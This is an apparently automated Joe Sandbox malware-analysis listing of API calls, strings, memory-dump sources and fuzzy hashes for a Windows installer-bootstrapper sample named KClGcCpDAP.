                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00884F0D
                                                            • GetLastError.KERNEL32(?,00000000,?,?,0087452F,?), ref: 00884F16
                                                            • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0087452F,?), ref: 00884FB8
                                                            • GetLastError.KERNEL32(?,0087452F,?), ref: 00884FC5
                                                            • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0087452F), ref: 00885040
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0087452F,?), ref: 0088504B
                                                            • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0087452F,?), ref: 0088508B
                                                            • LocalFree.KERNEL32(00000000,?,0087452F,?), ref: 008850B9
                                                            Strings
                                                            • Failed to create the security descriptor for the connection event and pipe., xrefs: 00884F44
                                                            • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 00884F08
                                                            • Failed to allocate full name of cache pipe: %ls, xrefs: 00885022
                                                            • pipe.cpp, xrefs: 00884F3A, 00884FE9, 0088506F
                                                            • Failed to create pipe: %ls, xrefs: 00884FF6, 0088507C
                                                            • \\.\pipe\%ls, xrefs: 00884F6E
                                                            • \\.\pipe\%ls.Cache, xrefs: 0088500C
                                                            • Failed to allocate full name of pipe: %ls, xrefs: 00884F84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                            • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                            • API String ID: 1214480349-3253666091
                                                            • Opcode ID: f4efeecad2bcb591f3416c7163d03e266a6bdd9b636295aa8d63e2a655c0101e
                                                            • Instruction ID: f04a64404d5d440dcfe7eeb55c5ed07c32c698e56255e6e2c574aad2e32c9d43
                                                            • Opcode Fuzzy Hash: f4efeecad2bcb591f3416c7163d03e266a6bdd9b636295aa8d63e2a655c0101e
                                                            • Instruction Fuzzy Hash: 4A519872D41A26BBDB21ABA48C46F9EBB74FF04710F114225FE10F6290D7B59E809BD1
                                                            APIs
                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00889F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 008AFAC7
                                                            • GetLastError.KERNEL32 ref: 008AFAD1
                                                            • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 008AFB0E
                                                            • GetLastError.KERNEL32 ref: 008AFB18
                                                            • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 008AFB5F
                                                            • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 008AFB83
                                                            • GetLastError.KERNEL32 ref: 008AFB8D
                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 008AFBCA
                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 008AFBE1
                                                            • GetLastError.KERNEL32 ref: 008AFBFC
                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 008AFC34
                                                            • GetLastError.KERNEL32 ref: 008AFC3E
                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 008AFC77
                                                            • GetLastError.KERNEL32 ref: 008AFC85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                            • String ID: cryputil.cpp
                                                            • API String ID: 3955742341-2185294990
                                                            • Opcode ID: eb48b52563b0e5e290d2daf78c051f5360279b25ff88b61e555546a3f31b69f0
                                                            • Instruction ID: bb5e23467f689e9bbac20ea6d0dee06651c7a102110557526aa333743235902a
                                                            • Opcode Fuzzy Hash: eb48b52563b0e5e290d2daf78c051f5360279b25ff88b61e555546a3f31b69f0
                                                            • Instruction Fuzzy Hash: E351E437D40239ABEB319A95CC04BEA7B74FB05761F0141B5BF48FA551E3B49D818AE0
                                                            Strings
                                                            • moving, xrefs: 0088A029
                                                            • Failed to create unverified path., xrefs: 00889F6E
                                                            • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00889FA4
                                                            • copying, xrefs: 0088A030, 0088A038
                                                            • Failed to move verified file to complete payload path: %ls, xrefs: 0088A06C
                                                            • Failed to concat complete cached path., xrefs: 00889EF4
                                                            • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00889FF1
                                                            • Failed to get cached path for package with cache id: %ls, xrefs: 00889EC8
                                                            • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00889FCB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                            • API String ID: 0-1289240508
                                                            • Opcode ID: 7e62836f9770f716524acd74e4c13ad92feae07095ff32632443dbf032514486
                                                            • Instruction ID: 459e4d260c7fb5096f22abd1b46af46de1bc536c0edabbc579066bb2105b14bc
                                                            • Opcode Fuzzy Hash: 7e62836f9770f716524acd74e4c13ad92feae07095ff32632443dbf032514486
                                                            • Instruction Fuzzy Hash: 24516E3194051AFADF227A98CC02FED7B76FF14710F144162FA00F52A1E7729E60AB86
                                                            APIs
                                                            • GetVersionExW.KERNEL32(0000011C), ref: 008762F8
                                                            • GetLastError.KERNEL32 ref: 00876302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastVersion
                                                            • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 305913169-1971907631
                                                            • Opcode ID: ff307d6581cb8cd8853546d4a13ea79192ff7559825316d7f1d666eda7f54854
                                                            • Instruction ID: 34d89de5149aa7ea0bf5ba934d0df66fdb35f5e154dd7422be2fe3a535bed70d
                                                            • Opcode Fuzzy Hash: ff307d6581cb8cd8853546d4a13ea79192ff7559825316d7f1d666eda7f54854
                                                            • Instruction Fuzzy Hash: 6D41B871A0062CABDB209B59CC49EEF7FB8FB45724F14419AF509E7240E670DE91CB91
                                                            APIs
                                                            • GetSystemTime.KERNEL32(?), ref: 00876062
                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00876076
                                                            • GetLastError.KERNEL32 ref: 00876088
                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 008760DC
                                                            • GetLastError.KERNEL32 ref: 008760E6
                                                            Strings
                                                            • variable.cpp, xrefs: 008760A3, 00876101
                                                            • Failed to get the required buffer length for the Date., xrefs: 008760AD
                                                            • Failed to allocate the buffer for the Date., xrefs: 008760C4
                                                            • Failed to get the Date., xrefs: 0087610B
                                                            • Failed to set variant value., xrefs: 00876124
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: DateErrorFormatLast$SystemTime
                                                            • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 2700948981-3682088697
                                                            • Opcode ID: 5f8c4cb0118ee517c501a779f08cc34200c5cbe87e7f47ba8376b41870718c00
                                                            • Instruction ID: 2d09f3a1e1c9c04e151c628e6449c08bc2fad2a70f59d4bf6ba1ab9b842c280c
                                                            • Opcode Fuzzy Hash: 5f8c4cb0118ee517c501a779f08cc34200c5cbe87e7f47ba8376b41870718c00
                                                            • Instruction Fuzzy Hash: 3931CD32A40A2ABBDB119BED8C46EEF7B64FB04710F114125FE08F7245E674DD4546E2
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(008DB5FC,00000000,?,?,?,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008AFEF4
                                                            • GetCurrentProcessId.KERNEL32(00000000,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008AFF04
                                                            • GetCurrentThreadId.KERNEL32 ref: 008AFF0D
                                                            • GetLocalTime.KERNEL32(8007139F,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008AFF23
                                                            • LeaveCriticalSection.KERNEL32(008DB5FC,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008B001A
                                                            Strings
                                                            • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 008AFFC0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                            • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                            • API String ID: 296830338-59366893
                                                            • Opcode ID: a8e6c56c4d37ff55486ed51f8057efdc77151a6157a83dbb4a57069c8eb2b1e9
                                                            • Instruction ID: bb262c00dd7eeff23282947024e16790c30d03faf738c058a476400beaeeccea
                                                            • Opcode Fuzzy Hash: a8e6c56c4d37ff55486ed51f8057efdc77151a6157a83dbb4a57069c8eb2b1e9
                                                            • Instruction Fuzzy Hash: C8416D71901219EFDF219FE8D804ABFB7B8FB19B11F104226FA01E6251DB349D81DBA1
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 00889BF2
                                                            • lstrlenW.KERNEL32(?), ref: 00889C19
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00889C79
                                                            • FindClose.KERNEL32(00000000), ref: 00889C84
                                                              • Part of subcall function 00873CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00873D40
                                                              • Part of subcall function 00873CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873D53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                            • String ID: *.*$.unverified
                                                            • API String ID: 457978746-2528915496
                                                            • Opcode ID: 96bd3606effb048e70755aa849575c53d79ccb0f7617624b171d5b7921d3267d
                                                            • Instruction ID: 5fe93df6587827b6d038b5efa34cc29f945d4590a3b41d9a25fd38603056d72f
                                                            • Opcode Fuzzy Hash: 96bd3606effb048e70755aa849575c53d79ccb0f7617624b171d5b7921d3267d
                                                            • Instruction Fuzzy Hash: 39418D3090152CAECB21BB68DD49BEAB7B9FF44301F4401A1E848F10A1EB769EC4DF15
                                                            APIs
                                                            • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 008B88D0
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 008B88E2
                                                            Strings
                                                            • feclient.dll, xrefs: 008B88AA
                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 008B88B9
                                                            • crypt32.dll, xrefs: 008B88A0
                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 008B892D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$InformationLocalSpecificSystemZone
                                                            • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                            • API String ID: 1772835396-1985132828
                                                            • Opcode ID: ffc486ab4b55f689216c8c707092b99837be4ce68c2d2f7ab57fa1519ab99a76
                                                            • Instruction ID: f45d595a610b81df3508fcb8ab0a86f991c0ff1c1eacb33ce1eca09f58c927a5
                                                            • Opcode Fuzzy Hash: ffc486ab4b55f689216c8c707092b99837be4ce68c2d2f7ab57fa1519ab99a76
                                                            • Instruction Fuzzy Hash: 8721F8A6901128EADB60DBA9DC05EBFB3FCFB4CB11F004556F955D2180E7389A84D771
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 5121694defc4c7146881993143fd6efae431012550c2e068577ce7550f3387f3
                                                            • Instruction ID: 4b50e5dfdc158e19b5f2a36a54719310f3dadc6d5e8fd0510d8ec9ee26f199ef
                                                            • Opcode Fuzzy Hash: 5121694defc4c7146881993143fd6efae431012550c2e068577ce7550f3387f3
                                                            • Instruction Fuzzy Hash: 37C24A71E086288FEB29CE28DD407EAB7B5FB46315F1441EAD40DE7641E778AE818F41
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastNameUser
                                                            • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 2054405381-1522884404
                                                            • Opcode ID: e0373eddf45c7f6aeba13c37b1e35075be49947da4910d8e38eadde63b126d96
                                                            • Instruction ID: 75fae795e55b206d9fbe9b4828969320476ff6ef099ba0ef36cb2b5c4fe429fc
                                                            • Opcode Fuzzy Hash: e0373eddf45c7f6aeba13c37b1e35075be49947da4910d8e38eadde63b126d96
                                                            • Instruction Fuzzy Hash: 6E01D632A41A29ABCB21AB58DC45EAF7BA8FF00720F114255FC18E7342EA74DD444AD6
                                                            APIs
                                                            • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,008B04F4,?,?,?,?,00000001), ref: 008AFE40
                                                            • GetLastError.KERNEL32(?,008B04F4,?,?,?,?,00000001,?,00875616,?,?,00000000,?,?,00875395,00000002), ref: 008AFE4C
                                                            • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,008B04F4,?,?,?,?,00000001,?,00875616,?,?), ref: 008AFEB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                            • String ID: logutil.cpp
                                                            • API String ID: 1365068426-3545173039
                                                            • Opcode ID: 414da3b3e905aea0aa9abc9e737a1c1bac17d63399ff77bde6ff5ea8cb558912
                                                            • Instruction ID: 939f523e880702ffcb100466908f236ca7a7f7d510e831a582cec8c64855296f
                                                            • Opcode Fuzzy Hash: 414da3b3e905aea0aa9abc9e737a1c1bac17d63399ff77bde6ff5ea8cb558912
                                                            • Instruction Fuzzy Hash: 8511BF32A00529EBEB21AFC48D45EAF7B69FF15710F018029FE04DA172D7718E30D6A1
                                                            APIs
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00896B32,00000000,00000003), ref: 00896B9F
                                                            • GetLastError.KERNEL32(?,00896B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00896F28,?), ref: 00896BA9
                                                            Strings
                                                            • msuengine.cpp, xrefs: 00896BCD
                                                            • Failed to set service start type., xrefs: 00896BD7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ChangeConfigErrorLastService
                                                            • String ID: Failed to set service start type.$msuengine.cpp
                                                            • API String ID: 1456623077-1628545019
                                                            • Opcode ID: 2054689ec431f74f6f86c3ba0ccb3acc1b8724260aa6a58ec93e95e5e9087eba
                                                            • Instruction ID: 7a2b63243de1295cf3943626abe00b4f229e5f376a210a33d4e422d81c5832af
                                                            • Opcode Fuzzy Hash: 2054689ec431f74f6f86c3ba0ccb3acc1b8724260aa6a58ec93e95e5e9087eba
                                                            • Instruction Fuzzy Hash: 8CF0A733A45236378B2136995C05E8B7E58FF017B07114325BD38FA2D0FA65C91085E1
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008A3D6E
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008A3D78
                                                            • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 008A3D85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: d4f7376444aaf9a6e97819dce579f85fd6cefba396674966290edcbc0e8a9be4
                                                            • Instruction ID: 24cc1861c9442620a8d7596e22fc1bc2660f32c81773ee0707d3af3936f16501
                                                            • Opcode Fuzzy Hash: d4f7376444aaf9a6e97819dce579f85fd6cefba396674966290edcbc0e8a9be4
                                                            • Instruction Fuzzy Hash: 8131B4749112289BCB61EF69D989789BBF8FF08710F5042EAE40CA6251E7709F818F45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                            • Instruction ID: b090209901b9f69c42070ffbf4f0f79e032d3d7576834d4b582d9e4c96b1a146
                                                            • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                            • Instruction Fuzzy Hash: E8021B71E002199FEF18CFA9C8806AEBBF1FF89314F258169D919E7740D735A941CB91
                                                            APIs
                                                              • Part of subcall function 008B3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008B3A8E,?), ref: 008B3C62
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008B3AB2
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008B3AC3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckCloseInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 2114926846-0
                                                            • Opcode ID: 5474bb15449fb4d4ad93840888b0225ee9e515d119b27cf46e69d2d5cea739d0
                                                            • Instruction ID: bb4478e1190d91db8869bc47e867cb09313d4f0daee21e52f7f5f7f63457fd58
                                                            • Opcode Fuzzy Hash: 5474bb15449fb4d4ad93840888b0225ee9e515d119b27cf46e69d2d5cea739d0
                                                            • Instruction Fuzzy Hash: 57110C7190061EAFDB10EFA4CC85BEFB7B8FF14300F645529A541E6251E7709A44CB55
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                            • FindClose.KERNEL32(00000000), ref: 008B4487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
